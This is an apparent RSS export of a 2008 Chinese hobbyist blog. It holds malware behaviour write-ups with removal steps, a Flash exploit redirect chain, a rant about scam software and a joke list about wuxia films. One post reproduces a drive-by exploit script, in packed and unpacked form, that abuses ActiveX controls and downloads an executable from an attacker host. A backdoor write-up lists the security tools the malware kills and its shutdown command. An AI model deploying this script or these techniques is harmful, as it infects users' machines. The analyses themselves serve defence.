        <description><![CDATA[
		
		<p>在某站抓了一包~~发现了这个，好厉害啊，会删安全工具</p>
<p>简单分析~~</p>
<p>文件名称：名称随机</p>
<p>文件大小：13149.dat</p>
<p>AV命名： Backdoor.Win32.Agent.ahj（Ikarus）</p>
<p>加壳方式：NsPack</p>
<p>文件MD5：ca2046a99c834aca83cef0efa848877f</p>
<p>主要行为：</p>
<p>1、释放文件：</p>
<p>%systemroot%\system32\释放3个随机文件名称的文件：</p>
<p>2个扩展名为dat，一个为dll，大小为243200 字节。</p>
<p>2、访问注册表键：SYSTEM\CurrentControlSet\Services\vmscsi</p>
<p>假设存在，即删除c:\ntldr（硬编码），并立刻执行命令行：shutdown -s -t 0 -f重启计算机</p>
<p>重启后虚拟机瘫痪。</p>
<p>3、添加启动项：</p>
<p>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad<br>
&nbsp;&nbsp;  Registry value: tyxzjal<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  Type: REG_SZ<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  Value: {18b39e76-903b-e580-a14c-903b16feedfb}</p>
<p>指向：C:\WINDOWS\system32\otsuevg.dll</p>
<p>4、启动rundll32.exe，进行链接库注入：rundll32.exe C:\WINDOWS\system32\130196.dat s</p>
<p>5、继续注入其他两个副本文件，应该是进程守护技术吧。</p>
<p>6、安装全局钩子，注入所有活动的进程。</p>
<p>7、查找计算机中是否安装快车、TM和QQ，如果有，则在其目录下生成病毒文件。</p>
<p>8、监控系统，如果尝试运行或加载这些文件会被删除（移动到临时文件夹）！！：</p>
<p>ollydbg.ini Libclsid.dat KNetWch.SYS mmskskin.dll Iereset.dll KASearch.DLL Rsaupd.exe libdll.dat CleanHis.dll WoptiClean.sys kakalib.def kkinst.ini KAVBootC.sys Ras.exe iehelp.exe trojandetector.exe KAConfig.DLL KAVPassp.DLL KKClean.dll VirUnk.def AntiActi.dll FileAnalyser.dll</p>
<p>（好乱啊，，，=.=）</p>
<p>9、还有这些关键字也会被结束删除（移动到临时文件夹）：</p>
<p>wopticlean 360safe \360\ Duba Kingsoft uschuk WangSea GYN Smallfrogs MicropoInt ArSwp 360Safe Spyware ackTh wb .com duba&nbsp;&nbsp; 360 修复 uba</p>
<p>并添加至： PendingFileRenameOperations延迟删除。</p>
<p>10、破坏安全模式，删除：</p>
<p>System\CurrentControlSet\Control\SafeBoot\Minimal&nbsp;&nbsp;&nbsp;  System\CurrentControlSet\Control\SafeBoot\Network</p>
<p>11、连接网络：s2f3.v78a344.com  h**p://www.ads520.com/等</p>
<p>下载木马，不过没实现！</p>
<p>12、每激活一个进程，病毒就会注入该进程，并执行上面的操作，会重写回注册表启动！</p>
<p> </p>
<p>解决方法：</p>
<p>其实很简单，进入System目录，查看最近修改的文件，</p>
<p>看到有3个文件大小一样的就删了（名字比较怪的）</p>
<p>然后打开注册表，查找这3个病毒名字，删除那些键</p>
<p> </p>
<div forimg="1">
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/pic/item/943fbc45a475042886947335.jpg"></p>
<p> </p>
<p> </p>
<div forimg="1">
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/pic/item/a1d63bcecb2e052eb700c836.jpg"></p>
<p> </p>
<p> </p>
<div forimg="1">
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/pic/item/513d0f3f9af1abfb55e72337.jpg"></p>
<p> </p>
<p> </p>
<div forimg="1"><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/pic/item/2e1f27f771ad4835730eec30.jpg"></div>
</div>
</div>
</div> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/category/%D4%AD%B4%B4%28%B2%A1%B6%BE%B7%D6%CE%F6%29%60%60%60">原创(病毒分析)```</a>&nbsp;<a href="http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/item/ff361e4ecf63d4ccd1c86adb.html#comment">查看评论</a>]]></description>
        <pubDate>2008-08-08  12:26</pubDate>
        <category><![CDATA[原创(病毒分析)```]]></category>
        <author><![CDATA[孤独更可靠]]></author>
		<guid>http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/item/ff361e4ecf63d4ccd1c86adb.html</guid>
</item>

<item>
        <title><![CDATA[Flash漏洞]]></title>
        <link><![CDATA[http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/item/abc1d2031237178dd43f7cd0.html]]></link>
        <description><![CDATA[
		
		<p>原发在其他论坛，直接复制了，懒编辑~~~</p>
<p> </p>
<p><br>
<br>
<img src="http://www.dehuaca.com/attachment.aspx?attachmentid=130383" ></p>
<div class="t_attach" style="display: none">
<div class="t_smallfont"> </div>
</div>
<p><br>
<br>
下面是解密过程：<br>
<br>
首先是一个Url16进制转义字符加密，解密得：<br>
<br>
hXXp://ipoqi.9999.la/<br>
<br>
这个网站会检测Referer，如果有效，则跳转页面：<br>
<br>
<span style="display: none; position: absolute"><img src="http://www.dehuaca.com/images/attachicons/attachimg.gif" border="0"></span><img src="http://www.dehuaca.com/attachment.aspx?attachmentid=130384" ></p>
<p><br>
<br>
<br>
如果Referer无效，则回应一个无效地址：<br>
<br>
<span style="display: none; position: absolute"><img src="http://www.dehuaca.com/images/attachicons/attachimg.gif" border="0"></span><img style="cursor: pointer" src="http://www.dehuaca.com/attachment.aspx?attachmentid=130385" width="551" resized="true"></p>
<p><br>
<br>
<br>
假设有效，继续跳转：<br>
<br>
h**p://221.212.156.108/cert/ip/1003473159.***<br>
<br>
然后到这里：<br>
<br>
<span style="display: none; position: absolute"><img src="http://www.dehuaca.com/images/attachicons/attachimg.gif" border="0"></span><img style="cursor: pointer" src="http://www.dehuaca.com/attachment.aspx?attachmentid=130386" width="551" resized="true"></p>
<div class="t_attach" style="display: none">
<div class="t_smallfont"> </div>
</div>
<p><br>
<br>
一个Packed```解密得：<br>
<br>
<img style="cursor: pointer" src="http://www.dehuaca.com/attachment.aspx?attachmentid=130387" width="551" resized="true"></p>
<div class="t_attach" style="display: none">
<div class="t_smallfont"> </div>
</div>
<p><br>
<br>
<br>
继续加密```:<br>
<br>
<span style="display: none; position: absolute"><img src="http://www.dehuaca.com/images/attachicons/attachimg.gif" border="0"></span><img style="cursor: pointer" src="http://www.dehuaca.com/attachment.aspx?attachmentid=130388" width="551" resized="true"></p>
<div class="t_attach" style="display: none">
<div class="t_smallfont"> </div>
</div>
<p><br>
<br>
解密后得到源代码，一个前段时间的Flash 0Day：<br>
<br>
<span style="display: none; position: absolute"><img src="http://www.dehuaca.com/images/attachicons/attachimg.gif" border="0"></span><img style="cursor: pointer" src="http://www.dehuaca.com/attachment.aspx?attachmentid=130389" width="551" resized="true"></p>
<div class="t_attach" style="display: none">
<div class="t_smallfont"> </div>
</div>
<p><br>
<br>
<br>
<br>
来自官方的安全警告:<br>
<br>
漏洞危害: 远程执行代码<br>
    - 严重程度: 紧急<br>
    - 漏洞描述: <br>
    Adobe Macromedia Flash Player处理Flash动画(SWF)文件的方式存在多个远程执<br>
    行代码漏洞。攻击者可以通过构建特制的Flash动画(SWF)文件来利用这些漏洞，<br>
    如果用户访问包含特制的SWF文件的网站，则可能允许远程执行代码。可能作为电<br>
    子邮件附件发送特制的SWF文件。只有当打开此电子邮件附件时，用户才会面临<br>
    风险。成功利用这些漏洞的攻击者可以完全控制受影响的系统。</p>
<p> </p>
<p>=============================================================</p>
<p> </p>
<p>官方的Flash最近版本：<br>
<br>
<a href="http://www.adobe.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" target="_blank">http://www.adobe.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash</a><br>
<br>
下载的时候会有一个可选的谷歌插件安装<br>
<br>
勾去掉...<br>
<br>
另外最近流行的还有一个Real漏洞，请及时修复撒（升级至最高版本）</p> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/category/%D4%AD%B4%B4%28%B2%A1%B6%BE%B7%D6%CE%F6%29%60%60%60">原创(病毒分析)```</a>&nbsp;<a href="http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/item/abc1d2031237178dd43f7cd0.html#comment">查看评论</a>]]></description>
        <pubDate>2008-06-22  12:01</pubDate>
        <category><![CDATA[原创(病毒分析)```]]></category>
        <author><![CDATA[孤独更可靠]]></author>
		<guid>http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/item/abc1d2031237178dd43f7cd0.html</guid>
</item>

<item>
        <title><![CDATA[关于无比强大的“酷睛监控器”]]></title>
        <link><![CDATA[http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/item/5eeffb39e5d046f63b87ce76.html]]></link>
        <description><![CDATA[
		
		<p>这个破软件看着眼熟~~翻了一下以前的博文</p>
<p>原来是之前傻逼&ldquo;远程嗅探软件&rdquo;的进化版啊！</p>
<p>太神奇了啊，膜拜！</p>
<p>看看这个简介吧！说明书里虽然硬是错了几字</p>
<p>但从大言不惭的字行里看起来还是牛逼牛逼滴。</p>
<p> </p>
<div forimg="1">
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/pic/item/bc03a9949c90700ad21b70c6.jpg"></p>
<p> </p>
<p>哈哈，我就不废话，这种垃圾傻逼软件都是骗人的，也就是骗流量。</p>
<p>赚非法所得。太猥琐了~</p>
<p>从这个傻逼软件的组件资源里可以看到有视频资源：</p>
<p> </p>
<div forimg="1">
<div forimg="1"><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/pic/item/f91fb9dd722ea0205982dddf.jpg"></div>
<p> </p>
<p>另外它的&ldquo;官网&rdquo;是最近才建的：</p>
<p> </p>
<div forimg="1">
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/pic/item/9f3fbf8f368105ee513d92da.jpg"></p>
<p> </p>
<p>里面搞笑的太多：<a href="http://www.kujingjiankong.cn/">http://www.kujingjiankong.cn/</a></p>
<p>哎，这年头，吃饱撑着的太多了~</p>
</div>
</div>
</div> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/category/%B2%BB%CE%F1%D5%FD%D2%B5%60%60">不务正业``</a>&nbsp;<a href="http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/item/5eeffb39e5d046f63b87ce76.html#comment">查看评论</a>]]></description>
        <pubDate>2008-05-26  20:17</pubDate>
        <category><![CDATA[不务正业``]]></category>
        <author><![CDATA[孤独更可靠]]></author>
		<guid>http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/item/5eeffb39e5d046f63b87ce76.html</guid>
</item>

<item>
        <title><![CDATA[SCVVHSOT.exe(Worm.Win32.AutoIt.e)病毒简单分析]]></title>
        <link><![CDATA[http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/item/f9b38eec374234382697919e.html]]></link>
        <description><![CDATA[
		
		<p><font face="宋体"><strong>文件名称：</strong></font><font face="Times New Roman">SCVVHSOT.exe</font><br>
<br>
<font face="宋体"><strong>文件大小：</strong></font><font face="Times New Roman">671,744 bytes</font><br>
<br>
<strong><font face="Times New Roman">AV</font><font face="宋体">命名：</font></strong><font face="Times New Roman">Worm.Win32.AutoIt.e</font><font face="宋体">（卡巴斯基）</font><br>
<br>
<strong><font face="宋体">文件</font><font face="Times New Roman">MD5</font><font face="宋体">：</font></strong><font face="Times New Roman">74A28F9B4AE5687BDE6692FC21E4C8F6</font><br>
<br>
<font face="宋体"><strong>病毒类型：</strong>病毒</font></p>
<p><br>
<br>
<font face="宋体"><strong><font color="#ff0000">主要行为：</font></strong></font><br>
<br>
<strong><font face="Times New Roman">1</font><font face="宋体">、释放文件：</font></strong><br>
<br>
<font face="Times New Roman">C:\Windows\System32\SCVVHSOT.exe<br>
671,744 bytes</font><br>
<font face="Times New Roman">C:\Windows\Tasks\At1.job<br>
346 bytes</font><br>
<br>
<strong><font face="Times New Roman">2</font><font face="宋体">、添加启动项：</font></strong><br>
<br>
<font face="Times New Roman">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run</font><br>
<br>
<font face="宋体">键名为：</font><font face="Times New Roman">Yahoo Messengger</font><font face="宋体">，指向</font><font face="Times New Roman">SCVVHSOT.exe</font><font face="宋体">。</font><br>
<br>
<strong><font face="Times New Roman">3</font><font face="宋体">、修改注册表，跟随</font><font face="Times New Roman">Explorer</font><font face="宋体">启动：</font></strong><br>
<br>
<font face="Times New Roman">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon</font><br>
<font face="Times New Roman">Shell = &quot;Explorer.exe SCVVHSOT.exe &quot;</font><br>
<br>
<strong><font face="Times New Roman">4</font><font face="宋体">、禁用注册表和任务管理器：</font></strong><br>
<br>
<font face="Times New Roman">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System</font><br>
<font face="Times New Roman">DisableTaskMgr = 0x00000001 </font><br>
<font face="Times New Roman">DisableRegistryTools = 0x00000001</font><br>
<br>
<strong><font face="Times New Roman">5</font><font face="宋体">、连接网络，下载乱七八糟的东西（未实现）：</font></strong><br>
<br>
<font face="Times New Roman">http://nhatquanglan2.0catch.com/setting.nql </font><br>
<font face="Times New Roman">http://nhatquanglan2.0catch.com/setting.xls </font><br>
<font face="Times New Roman">http://www.freewebs.com/nhattruongquang/setting.nql </font><br>
<a href="http://www.freewebs.com/nhattruongquang/setting.xls" target="_blank"><font face="Times New Roman"><font color="#0000ff">http://www.freewebs.com/nhattruongquang/setting.xls</font></font></a><br>
<br>
<strong><font face="Times New Roman">6</font><font face="宋体">、添加一个计划任务：</font></strong><br>
<br>
<br>
<font face="Times New Roman">C:\Windows\Tasks\At1.job</font><br>
<br>
<font face="Times New Roman">346</font><font face="宋体">字节的</font><font face="Times New Roman">~~</font><br>
<br>
<font face="宋体"><strong><font color="#0000ff">解决方法：</font></strong></font><br>
<br>
<strong><font face="Times New Roman">1</font><font face="宋体">、下载</font><font face="Times New Roman">Sreng</font><font face="宋体">。后断开网络连接。</font></strong><br>
<br>
<br>
<strong><font face="宋体"><a href="http://www.kingzoo.com/tools/" target="_blank">http://www.kingzoo.com/tools/</a>孤独更可靠/sreng2.5.zip</font></strong><br>
<br>
<strong><font face="Times New Roman">2</font><font face="宋体">、打开</font><font face="Times New Roman">Sreng</font><font face="宋体">，它会提示</font></strong><br>
<br>
<br>
<font face="Times New Roman">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon</font><br>
<br>
<font face="宋体">项被恶意修改，点确定后自动修复</font><br>
<br>
<strong><font face="Times New Roman">3</font><font face="宋体">、删除</font><font face="Times New Roman">Yahoo Messengger</font><font face="宋体">，指向</font><font face="Times New Roman">SCVVHSOT.exe</font><font face="宋体">的。</font></strong><br>
<br>
<strong><font face="Times New Roman">4</font><font face="宋体">、重启计算机，删除文件：</font></strong><br>
<br>
<font face="Times New Roman">C:\Windows\System32\SCVVHSOT.exe</font><br>
<font face="Times New Roman">C:\Windows\Tasks\At1.job</font></p>
<p> </p>
<div forimg="1"><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/pic/item/c8d026faa9b48b8459ee90be.jpg"></div> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/category/%D4%AD%B4%B4%28%B2%A1%B6%BE%B7%D6%CE%F6%29%60%60%60">原创(病毒分析)```</a>&nbsp;<a href="http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/item/f9b38eec374234382697919e.html#comment">查看评论</a>]]></description>
        <pubDate>2008-05-18  11:11</pubDate>
        <category><![CDATA[原创(病毒分析)```]]></category>
        <author><![CDATA[孤独更可靠]]></author>
		<guid>http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/item/f9b38eec374234382697919e.html</guid>
</item>

<item>
        <title><![CDATA[某网站。。]]></title>
        <link><![CDATA[http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/item/d86dd619b634667fdab4bd0a.html]]></link>
        <description><![CDATA[
		
		<p> </p>
<div forimg="1">
<p><a target="_blank" href="http://hiphotos.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/pic/item/4f43b02f31137e2b1f30890f.jpg"><img class="blogimg" border="0" small="1" src="http://hiphotos.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/abpic/item/4f43b02f31137e2b1f30890f.jpg"></a></p>
<p> </p>
<p> </p>
<div forimg="1">
<p><a target="_blank" href="http://hiphotos.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/pic/item/a7c03017ab3dec124b90a76b.jpg"><img class="blogimg" border="0" small="1" src="http://hiphotos.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/abpic/item/a7c03017ab3dec124b90a76b.jpg"></a></p>
<p> </p>
<p> </p>
<div forimg="1">
<p><a target="_blank" href="http://hiphotos.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/pic/item/2a9bf733c1558450ac4b5f6b.jpg"><img class="blogimg" border="0" small="1" src="http://hiphotos.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/abpic/item/2a9bf733c1558450ac4b5f6b.jpg"></a></p>
<p> </p>
<p>都是挂的机器狗~~太猥琐了</p>
<p>利用漏洞：</p>
<p>MS06-014&nbsp;&nbsp;  REAl  暴风 联众</p>
<p> </p>
<p>其他：</p>
<p><br>
&lt;iframe src=http://cc.zuiyige.net/wmwm/new.htm width=0 height=0&gt;&lt;/iframe&gt;&lt;script language=&quot;javascript&quot; type=&quot;text/javascript&quot; src=&quot;<a href="http://js.users.51.la/1724160.js&quot;&gt;&lt;/script">http://js.users.51.la/1724160.js&quot;&gt;&lt;/script</a>&gt;</p>
<p> </p>
<p><br>
&lt;script&gt;eval(function(p,a,c,k,e,d){e=function(c){return(c&lt;a?'':e(parseInt(c/a)))+((c=c%a)&gt;35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1e x(){3.b()}1f.1b=x;5(3.D.1h(\'A\')==-1){9{2 e;2 o=(3.1t(&quot;4&quot;));o.1l(&quot;L&quot;,&quot;1m:S-T-R-Q-O&quot;);2 P=o.V(&quot;11.Z&quot;,&quot;&quot;)}a(e){};7{2 d=8 N();d.W(d.X()+12*w*w*G);3.D=\'A=F;E=/;d=\'+d.M();5(e!=&quot;[4 6]&quot;){3.b(&quot;&lt;c l=n:\\/\\/s.p.r\\/q\\/H.t&gt;&lt;<a>\\/c&gt;&quot;)}K{9{2</a> f;2 J=8 k(&quot;B.B.1&quot;)}a(f){};7{5(f!=&quot;[4 6]&quot;){3.b(&quot;&lt;c l=n:\\/\\/s.p.r\\/q\\/Y.t&gt;&lt;<a>\\/c&gt;&quot;)}}9{2</a> g;2 1v=8 k(&quot;1n.13&quot;)}a(g){};7{5(g!=&quot;[4 6]&quot;){3.b(&quot;&lt;c l=n:\\/\\/s.p.r\\/q\\/1u.t&gt;&lt;<a>\\/c&gt;&quot;)}}9{2</a> h;2 1q=8 k(&quot;1r.1i.1&quot;)}a(h){};7{5(h!=&quot;[4 6]&quot;){3.b(&quot;&lt;m u=\'10\'z=\'10\'l=\'18.C\'&gt;&lt;/m&gt;&quot;)}}9{2 i;2 19=8 k(&quot;17.16 14 15 1a.1&quot;)}a(i){};7{5(i!=&quot;[4 6]&quot;){3.b(&quot;&lt;m u=\'10\'z=\'10\'l=\'1c.C\'&gt;&lt;/m&gt;&quot;)}}9{2 j;2 v=8 k(&quot;I.1d&quot;)}a(j){};7{5(j!=&quot;[4 6]&quot;){v.1g(&quot;n://1s.1p.1o/1k/y.1j&quot;,&quot;y.U&quot;,0)}}}}}',62,94,'||var|document|object|if|Error|finally|new|try|catch|write|script|expires|||||||ActiveXObject|src|iframe|http|ado|zuiyige|wmwm|net|cc|js|width|obj|60|init|abd|height|setcookie|IERPCtl|htm|cookie|path|newckie|1000|a014|BaiduBar|reals|else|classid|toGMTString|Date|00C04FC29E36|as|983A|11D0|BD96C556|65A3|exe|createobject|setTime|getTime|arl|Stream||Adodb|24|StormPlayer|RAM|Download|RealPlayer|rmocx|alz|newsreal|Handler|onload|anrl|Tool|function|window|DloadDS|indexOf|GLChatCtrl|cab|mmuu|setAttribute|clsid|MPS|com|tianxiayouzei|Lz|GLCHAT|dd|createElement|abf|storm'.split('|'),0,{}))</p>
<p> </p>
<p><br>
function init(){document.write()}window.onload=init;if(document.cookie.indexOf('setcookie')==-1){try{var e;var ado=(document.createElement(&quot;object&quot;));ado.setAttribute(&quot;classid&quot;,&quot;clsid:BD96C556-65A3-11D0-983A-00C04FC29E36&quot;);var as=ado.createobject(&quot;Adodb.Stream&quot;,&quot;&quot;)}catch(e){};finally{var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='setcookie=newckie;path=/;expires='+expires.toGMTString();if(e!=&quot;[object Error]&quot;){document.write(&quot;&lt;script src=http:\/\/cc.zuiyige.net\/wmwm\/a014.js&gt;&lt;\/script&gt;&quot;)}else{try{var f;var reals=new ActiveXObject(&quot;IERPCtl.IERPCtl.1&quot;)}catch(f){};finally{if(f!=&quot;[object Error]&quot;){document.write(&quot;&lt;script src=http:\/\/cc.zuiyige.net\/wmwm\/arl.js&gt;&lt;\/script&gt;&quot;)}}try{var g;var storm=new ActiveXObject(&quot;MPS.StormPlayer&quot;)}catch(g){};finally{if(g!=&quot;[object Error]&quot;){document.write(&quot;&lt;script src=http:\/\/cc.zuiyige.net\/wmwm\/abf.js&gt;&lt;\/script&gt;&quot;)}}try{var h;var Lz=new ActiveXObject(&quot;GLCHAT.GLChatCtrl.1&quot;)}catch(h){};finally{if(h!=&quot;[object Error]&quot;){document.write(&quot;&lt;iframe width='10'height='10'src='alz.htm'&gt;&lt;/iframe&gt;&quot;)}}try{var i;var newsreal=new ActiveXObject(&quot;rmocx.RealPlayer RAM Download Handler.1&quot;)}catch(i){};finally{if(i!=&quot;[object Error]&quot;){document.write(&quot;&lt;iframe width='10'height='10'src='anrl.htm'&gt;&lt;/iframe&gt;&quot;)}}try{var j;var obj=new ActiveXObject(&quot;BaiduBar.Tool&quot;)}catch(j){};finally{if(j!=&quot;[object Error]&quot;){obj.DloadDS(&quot;<a href="http://dd.tianxiayouzei.com/mmuu/abd.cab&quot;,&quot;abd.exe&quot;,0">http://dd.tianxiayouzei.com/mmuu/abd.cab&quot;,&quot;abd.exe&quot;,0</a>)}}}}}</p>
<p>&lt;/script&gt;</p>
</div>
</div>
</div> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/category/%B5%E7%C4%D4%CF%E0%B9%D8">电脑相关</a>&nbsp;<a href="http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/item/d86dd619b634667fdab4bd0a.html#comment">查看评论</a>]]></description>
        <pubDate>2008-05-10  12:22</pubDate>
        <category><![CDATA[电脑相关]]></category>
        <author><![CDATA[孤独更可靠]]></author>
		<guid>http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/item/d86dd619b634667fdab4bd0a.html</guid>
</item>

<item>
        <title><![CDATA[（转）中国武侠片的60条经典定律]]></title>
        <link><![CDATA[http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/item/36e3a3b19f99f650092302af.html]]></link>
        <description><![CDATA[
		
		<p><font color="#ff0000" size="3"><strong>原文链接：</strong></font><a href="http://www.dehuaca.com/dispbbs.asp?boardID=20&amp;ID=75889&amp;page=1"><font color="#ff0000" size="3"><strong>http://www.dehuaca.com/dispbbs.asp?boardID=20&amp;ID=75889&amp;page=1</strong></font></a></p>
<p><font size="3"><span>1. 悦来客栈是古代最大的连锁客栈。 <br>
2. 超级巨毒，解药，暗器都产自西域。 <br>
3. 平时朝夕相处的人，只要穿上夜行衣，再蒙个面纱，对方就不认识了。 <br>
4. 没用的小角色用的武功名字有很强的文学性和动物性，就是不大好用。 <br>
5. 长着超长白发+胡子的绝对是旷世高人，和他要拉好关系。 <br>
6. 英雄配一把好兵器，好到从不用去保养修理。 <br>
7. 在乱箭中，英雄要是不想死，就决不会死；万一中了箭，那也是因为一旁有大恶人挟持其亲人导致英雄分心。 <br>
8. 一定要象征性的打几下，才出绝招，并喷着口水大叫：&ldquo;去死吧！&rdquo; <br>
9. 使出必杀技要做很花哨的动作，还要做上一两分钟，但敌人决不会乘机偷袭，尽管这是个好机会…… <br>
10. 高手都无视万有引力，到处乱飞且飞得飞快。不过要是赶远路，却会骑马。 <br>
11. 大侠套餐：2斤熟牛肉+上等女儿红。（悦来客栈长期供应……） <br>
12. 好人从不下毒，坏人从不不下毒；但好人从不下毒却老被诬陷下毒，坏人从不不下毒却没人怀疑他。 <br>
13. 大侠想显示自己的修为，往往会捡起一根树枝将不知天高地厚的小角色打败，后来悦来客栈开始供应树枝…… <br>
14. 在一条笔直的街道被人追杀，尽管有很多事要做，但弄翻两旁的小摊是最重要的！ <br>
15. 好人用暗器是形式所逼，多才多艺，一击必中；坏人用暗器是卑鄙无耻，旁门左道，扔死了都扔不中…… <br>
16. 坏人千辛万苦扔中了，还会被好人忍着巨痛放倒，并喷着口水大叫：&ldquo;卑鄙！&rdquo; <br>
17. 会有绝世佳人救起中暗器的英雄，日不久也生情…… <br>
18. 当时社会治安不好，人人佩带危险器械…… <br>
19. 菜市场杀猪的绝对是一胖子！ <br>
20. 绝世神兵被麻布一层一层裹紧，绝世神人也被麻布一层一层裹紧…… <br>
21. 主角一生坎坷或是一帆风顺，一生坎坷的会坎坷到死，一帆风顺的从不买彩票…… <br>
22. 所有人都很有钱，铜板很少出现，一张一张的银票比草纸还便宜。 <br>
23. （悦来客栈的）店小二知识渊博，有问（+钱）必答！ <br>
24. 有钱人姓金，钱；穷人叫二狗。好人坏人伪君子一听名字就知道。 <br>
25. 少林寺就1个方丈（老和尚那种8算）和1个徒弟厉害，其他都很菜。 <br>
26. 练秘籍要分性别，别如男的，女的，男女混合的，不男不女的…… <br>
27. 很喜欢在酒楼（悦来客栈）里闹事，先掀桌子，再摔椅子，最后才火拼。 <br>
28. 有时候可以一剑劈掉巨石，有时候却劈不掉一张八仙桌。 <br>
29. 英雄都很帅，大反派也很帅，龙套长相鲜明。 <br>
30. 经典台词：A：在下***，江湖人称****。 <br>
B：原来是***，久仰久仰。 <br>
A:不敢当不敢当…… <br>
</span></font></p>
<p><font size="3"><span>31．单挑是， &ldquo; 正义 &rdquo; 一方支撑不住了，就会喊人帮忙： &ldquo; 对付这种魔头，不用和他讲什么江湖道义，大家一起上！ &rdquo; <br>
32．打擂时，一定是翻个跟头上去的，再用30条的经典台词…… <br>
33.螳螂拳经久不衰，太极拳只有2个人会…… <br>
34.少林图书馆经常失窃…… <br>
35.尽管高手可以用鼻子闻到敌人的气息，但在被偷听时，只有对方碰翻了什么东西才能察觉。 <br>
36.被察觉的人往往在快被追上时扔闪光弹，并在这一段时间逃的比平时快10倍。 <br>
37.都喜欢假死。 <br>
38．一个人喝完闷酒一定会下暴雨。 <br>
39.一下暴雨就会打并且只打一个雷。 <br>
40.团体组合流行：四大?#，四大%￥，四大*（…… <br>
41.拔剑时，有时会有剑气，有时会拔不出来…… <br>
42.朝廷的大将军是坨屎，公公才是高手。 <br>
43．总有那么一本书、剑、玉让人抢。 <br>
44.拥有比网络更快的传播方式――嘴！ <br>
45.没见过有谁上厕所，要是有的话，那是因为被下了泻药…… <br>
46.妓院都是怡红院（我怀疑是悦来集团的子公司……）。 <br>
47.发型高度定型，甩一甩就恢复（用潘婷的？） <br>
48.要么从小习武，要么从不习武，否则是成不了大器的。 <br>
49.大侠胜利的方式只有2种：一招搞定或100，200，300招搞定…… <br>
50.美女到处都是，这是最郁闷的…… <br>
</span>51.英雄在受挫后，一般会遇到绝世高人或父辈的（师）兄弟、至交好友，学完功夫回来报仇……</font></p>
<p><font size="3">52.英雄的父亲通常都是人人敬重的英雄或人人唾骂的败类……</font></p>
<p><font size="3">53.主角最后通常都会和爱人隐居……</font></p>
<p><font size="3">54.害主角家破人亡的通常是主角的叔叔……</font></p>
<p><font size="3">55.主角的表兄弟或堂兄弟通常都是纨绔子弟……</font></p>
<p><font size="3">56.主角都有3个以上红颜知己……</font></p>
<p><font size="3">57.主角一般都是练武奇才……</font></p>
<p><font size="3">58.主角练武功都比别人快……<br>
<br>
59.主角都会交到一个邪派的好朋友，而且是生死与共的那种……</font></p>
